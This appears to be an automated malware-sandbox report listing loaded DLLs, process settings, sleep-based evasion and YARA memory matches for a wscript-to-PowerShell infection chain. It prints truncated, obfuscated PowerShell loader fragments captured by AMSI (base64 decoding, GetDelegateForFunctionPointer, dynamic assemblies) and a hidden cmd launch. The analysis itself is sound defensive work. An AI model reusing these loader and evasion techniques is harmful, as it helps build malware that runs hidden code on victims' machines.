      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb> source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.Core.pdb# source: powershell.exe, 00000007.00000002.2106847629.0000000006D58000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1", "0", "1");IWshShell3.Run("cmd.exe /c ping 127.0.0.1", "0", "1");IWshShell3.Run("powershell "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes", "0")
      Source: Yara matchFile source: 00000007.00000002.2119893236.00000000092E7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.2336376984.0000000004897000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Outrive)$globaL:HAiRpiecEs = [sysTEm.TEXT.ENCodiNG]::aScII.GETsTRinG($FRigGAs)$gloBAl:EMEndAtiOnErne=$HaIrpIeCEs.suBsTRiNg($gENKENDELSesGldES,$DIsCOmMODEs)<#gendanne touchback Svngng
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Gavekortets $Muliggoerbandonedly $Landskinkernes), (Fotodetektorens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:skadeligste = [AppDomain]::CurrentDomai
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($nierne)), $Vilhelmines).DefineDynamicModule($Rugmel15, $false).DefineType($Skrigeungernes20, $undermanned, [System.MulticastDelegate])
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Outrive)$globaL:HAiRpiecEs = [sysTEm.TEXT.ENCodiNG]::aScII.GETsTRinG($FRigGAs)$gloBAl:EMEndAtiOnErne=$HaIrpIeCEs.suBsTRiNg($gENKENDELSesGldES,$DIsCOmMODEs)<#gendanne touchback Svngng
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B5B2D9 push esp; retf 7_2_00B5B2E1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B59E20 push esp; ret 7_2_00B5A159
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06EDEDDE push ds; ret 7_2_06EDEDDF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06EDFA58 push A407E96Ah; retf 7_2_06EDFBCD
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_087208B0 push ds; iretd 7_2_087208B1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872122B pushad ; iretd 7_2_0872122C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_087265A6 push es; ret 7_2_087265B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08721E53 push 83F44D5Ch; retf 7_2_08721EBF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08722E4D push edx; retf 7_2_08722E58
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872060D push edx; ret 7_2_08720626
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872474B push ebp; ret 7_2_0872474D
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5867Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4018Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6447Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3185Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6272Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 6792Thread sleep time: -30000s >= -30000sJump to behavior
